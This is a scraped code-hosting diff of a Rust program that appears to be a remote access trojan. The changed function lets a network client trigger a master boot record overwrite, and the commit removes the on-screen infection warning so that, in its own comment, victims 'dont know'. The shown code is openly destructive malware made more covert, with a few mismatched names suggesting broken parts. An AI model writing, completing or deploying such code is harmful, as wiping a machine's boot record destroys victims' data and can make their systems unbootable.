File tree Expand file tree Collapse file tree 1 file changed +1
-9
lines changed Expand file tree Collapse file tree 1 file changed +1
-9
lines changed Original file line number Diff line number Diff line change @@ -30,7 +30,7 @@ async fn handle_client(mut stream: TcpStream) {
30
30
tokio:: time:: sleep ( tokio:: time:: Duration :: from_secs ( 1 ) ) . await ;
31
31
}
32
32
stream. write ( b"loading..." ) . await . unwrap ( ) ;
33
- unclo ( ) ; // Call the unclose a ble? GUI window
33
+ // no window so they dont know :D
34
34
mbr_overwrite ( ) ; // Call the MBR overwrite function here
35
35
stream. write ( b"target destroyed?" ) . await . unwrap ( ) ;
36
36
}
@@ -51,12 +51,4 @@ fn mbr_overwrite() {
51
51
52
52
CloseHandle ( h_device) ;
53
53
}
54
-
55
- fn unclos ( ) {
56
- let mut window = tk:: Window :: new ( ) ;
57
- window. set_title ( "WARNING (RAT)" ) ;
58
- window. set_geometry ( "300x200" ) ;
59
- let label = tk:: Label :: new ( & window, "Your computer has been affected by a Remote RAT! Good luck lol <3" ) ;
60
- label. pack ( ) ;
61
- window. mainloop ( ) ;
62
54
} // 60 lines!
You can’t perform that action at this time.
0 commit comments